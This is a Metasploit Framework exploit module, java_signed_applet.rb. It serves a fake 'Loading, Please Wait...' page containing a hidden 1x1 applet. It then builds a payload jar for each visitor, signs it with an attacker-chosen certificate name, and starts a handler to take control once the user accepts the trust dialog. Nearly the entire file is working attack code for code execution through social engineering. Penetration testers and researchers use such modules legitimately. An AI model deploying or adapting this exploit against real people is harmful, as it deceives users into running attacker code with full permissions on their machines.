metasploit-framework/modules/exploits/multi/browser/java_signed_applet.rb

##
# $Id$
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'
require 'rex'
require 'rex/zip'

class Metasploit3 < Msf::Exploit::Remote
	Rank = ExcellentRanking

	include Msf::Exploit::Remote::HttpServer::HTML
	include Msf::Exploit::Java
	include Msf::Exploit::EXE

	def initialize( info = {} )
		super( update_info( info,
			'Name'          => 'Signed Applet Social Engineering Code Exec',
			'Description'   => %q{
					This exploit dynamically creates an applet via the Msf::Exploit::Java mixin, converts it
				to a .jar file, then signs the .jar with a dynamically created certificate containing
				values of your choosing.  This is presented to the end user via a web page with an applet
				tag, loading the signed applet.  Once the user clicks "run", the applet
				executes with full user permissions.

				The user's JVM pops a dialog asking if they trust the signed applet.  On
				older versions the dialog will display our provided CN in the "Publisher"
				line.  Newer JVMs display "UNKNOWN" when the signature is not trusted
				(i.e., it's not signed by a trusted CA). The SigningCert option allows you
				to provide a trusted cert.  If SigningCert is not given, a randomly
				generated cert will be used.
			},
			'License'       => MSF_LICENSE,
			'Author'        => [ 'natron' ],
			'Version'       => '$Revision$',
			'References'    =>
				[
					[ 'URL', 'http://www.defcon.org/images/defcon-17/dc-17-presentations/defcon-17-valsmith-metaphish.pdf' ]
				],
			'Platform'      => [ 'java', 'win', 'osx', 'linux', 'solaris' ],
			'Payload'       => { 'BadChars' => '', 'DisableNops' => true },
			'Targets'       =>
				[
					[ 'Generic (Java Payload)',
						{
							'Platform' => ['java'],
							'Arch' => ARCH_JAVA
						}
					],
					[ 'Windows x86 (Native Payload)',
						{
							'Platform' => 'win',
							'Arch' => ARCH_X86,
						}
					],
					[ 'Linux x86 (Native Payload)',
						{
							'Platform' => 'linux',
							'Arch' => ARCH_X86,
						}
					],
					[ 'Mac OS X PPC (Native Payload)',
						{
							'Platform' => 'osx',
							'Arch' => ARCH_PPC,
						}
					],
					[ 'Mac OS X x86 (Native Payload)',
						{
							'Platform' => 'osx',
							'Arch' => ARCH_X86,
						}
					]
				],
			'DefaultTarget' => 1
		))
		register_options( [
			OptString.new('CERTCN', [ true,
				"The CN= value for the certificate. Cannot contain ',' or '/'",
				"SiteLoader"
				]),
			OptString.new('APPLETNAME', [ true,
				"The main applet's class name.",
				"SiteLoader"
				]),
			OptPath.new('SigningCert', [ false,
				"Path to a signing certificate in PEM or PKCS12 (.pfx) format"
				]),
			OptPath.new('SigningKey', [ false,
				"Path to a signing key in PEM format"
				]),
			OptString.new('SigningKeyPass', [ false, 
				"Password for signing key (required if SigningCert is a .pfx)"
				]),
		], self.class)
	end


	def setup
		load_cert
		super
	end


	def on_request_uri( cli, request )
		if not request.uri.match(/\.jar$/i)
			if not request.uri.match(/\/$/)
				send_redirect( cli, get_resource() + '/', '')
				return
			end

			print_status( "Handling request from #{cli.peerhost}:#{cli.peerport}..." )

			send_response_html( cli, generate_html, { 'Content-Type' => 'text/html' } )
			return
		end

		p = regenerate_payload(cli)
		if not p
			print_error("Failed to generate the payload.")
			# Send them a 404 so the browser doesn't hang waiting for data
			# that will never come.
			send_not_found(cli)
			return
		end

		# If we haven't returned yet, then this is a request for our applet
		# jar, build one for this victim.
		jar = p.encoded_jar

		data_dir = File.join(Msf::Config.data_directory, "exploits", "java_signed_applet")
		jar.add_file("SiteLoader.class", File.read(File.join(data_dir, "SiteLoader.class")))
		jar.build_manifest(:main_class => "metasploit.Payload")

		jar.sign(@key, @cert, @ca_certs)
		#File.open("payload.jar", "wb") { |f| f.write(jar.to_s) }

		print_status(
			"Sending #{datastore['APPLETNAME']}.jar to #{cli.peerhost}.  "+
			"Waiting for user to click 'accept'...")
		send_response( cli, jar.to_s, { 'Content-Type' => "application/octet-stream" } )

		handler( cli )

	end

	def load_cert
		if datastore["SigningCert"]
			cert_str = File.read(datastore["SigningCert"])
			begin
				pfx = OpenSSL::PKCS12.new(cert_str, datastore["SigningKeyPass"])
				@cert = pfx.certificate
				@key  = pfx.key
				@ca_certs = pfx.ca_certs

			rescue OpenSSL::PKCS12::PKCS12Error
				# it wasn't pkcs12, try it as concatenated PEMs
				certs = cert_str.scan(/-+BEGIN CERTIFICATE.*?END CERTIFICATE-+/m)
				@cert = OpenSSL::X509::Certificate.new(certs.shift)
				@ca_certs = nil
				while certs.length > 0
					@ca_certs ||= []
					@ca_certs << OpenSSL::X509::Certificate.new(certs.shift)
				end

				if datastore["SigningKey"] and File.file?(datastore["SigningKey"])
					key_str = File.read(datastore["SigningKey"])
				else
					key_str = cert_str
				end

				# First try it as RSA and fallback to DSA if that doesn't work
				begin
					@key = OpenSSL::PKey::RSA.new(cert_str, datastore["SigningKeyPass"])
				rescue OpenSSL::PKey::RSAError => e
					@key = OpenSSL::PKey::DSA.new(cert_str, datastore["SigningKeyPass"])
				end
			end
		else
			# Name.parse uses a simple regex that isn't smart enough to allow
			# slashes or commas in values, just remove them.
			certcn = datastore["CERTCN"].gsub(%r|[/,]|, "")
			x509_name = OpenSSL::X509::Name.parse(
				"C=Unknown/ST=Unknown/L=Unknown/O=Unknown/OU=Unknown/CN=#{certcn}"
				)

			@key  = OpenSSL::PKey::DSA.new(1024)
			@cert = OpenSSL::X509::Certificate.new
			@cert.version = 2
			@cert.serial = 1
			@cert.subject = x509_name
			@cert.issuer = x509_name
			@cert.public_key = @key.public_key
			@cert.not_before = Time.now
			@cert.not_after = @cert.not_before + 3600*24*365*3 # 3 years
		end
	end


	def generate_html
		html  = %Q|<html><head><title>Loading, Please Wait...</title></head>\n|
		html << %Q|<body><center><p>Loading, Please Wait...</p></center>\n|
		html << %Q|<applet archive="#{datastore["APPLETNAME"]}.jar"\n|
		if @use_static
			html << %Q|  code="SiteLoader" width="1" height="1">\n|
		else
			html << %Q|  code="#{datastore["APPLETNAME"]}" width="1" height="1">\n|
		end
		html << %Q|</applet>\n</body></html>|
		return html
	end


	# Currently unused until we ship a java compiler of some sort
	def applet_code
		applet = <<-EOS
import java.applet.*;
import metasploit.*;

public class #{datastore["APPLETNAME"]} extends Applet {
	public void init() {
		try {
			Payload.main(null);
		} catch (Exception ex) {
			//ex.printStackTrace();
		}
	}
}
EOS
	end
end

=begin

The following stores a bunch of intermediate files on the path to creating the signature.  The
ImportKey class used for testing was obtained from:
http://www.agentbob.info/agentbob/79-AB.html

	system("rm -rf signed_crap/*")
	File.open("signed_crap/cert.pem", "wb")     { |f| f.write(@cert.to_s + @key.to_s) }
	File.open("signed_crap/key.pem",  "wb")     { |f| f.write(@key.to_s  + @key.public_key.to_s) }
	File.open("signed_crap/unsigned.jar", "wb") { |f| f.write jar.to_s }

	File.open("signed_crap/jarsigner-signed.jar", "wb") { |f| f.write jar.to_s }
	system("openssl x509 -in signed_crap/cert.pem -inform PEM -out signed_crap/cert.der -outform DER")
	system("openssl pkcs8 -topk8 -nocrypt -in signed_crap/key.pem -inform PEM -out signed_crap/key.der -outform DER")
	system("java -cp . ImportKey signed_crap/key.der signed_crap/cert.der")
	system("mv ~/keystore.ImportKey ~/.keystore")
	system("jarsigner -storepass importkey signed_crap/jarsigner-signed.jar importkey")

	jar.sign(@key, @cert)
	File.open("signed_crap/signed.jar", "wb")   { |f| f.write jar.to_s }

=end